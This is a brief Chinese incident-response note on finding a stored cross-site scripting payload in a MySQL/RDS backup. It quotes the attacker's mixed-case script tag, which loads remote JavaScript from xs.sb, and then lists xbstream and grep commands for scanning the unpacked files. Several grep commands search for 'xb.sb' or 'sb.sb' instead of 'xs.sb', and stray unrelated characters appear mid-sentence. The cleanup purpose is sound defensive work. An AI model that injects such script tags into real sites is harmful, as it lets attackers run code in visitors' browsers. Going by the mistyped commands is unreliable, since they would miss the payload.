原因
用戶提交惡意腳本,例如<sCrIpt srC=//xs.sb/xF2l></sCRipT>
。需要排查數(shù)據(jù)庫中所有字段是否含字符串:xs.sb
做法
# 1. 下載rds上備份到本地linux機(jī)器赶诊,例如xxx_qp.xb文件,本人50G左右
# 2. 解壓到當(dāng)前目錄
cat xxx_qp.xb | xbstream -x -v -C ./
# 分析每個文件含有惡意字符串的行,去掉參數(shù)-a可以只檢查是否存在
grep -arn "xb.sb" backup-my.cnf.qp ibdata1.qp rds_table_info_json_40212.log
grep -arn "xb.sb" xt*
grep -arn "sb.sb" mysql
grep -arn 'xs.sb' performance_schema/
grep -arn 'xs.sb' report/
grep -arn 'xs.sb' sonar/
grep -arn 'xs.sb' sys/
grep -arn 'xs.sb' ycb_old/
grep -arn 'xs.sb' ycb_fund/
grep -arn 'xs.sb' youbei_web/ > xs_sb_youbei_web.txt
grep -arn 'xs.sb' ycb/ > xs_sb_ycb.txt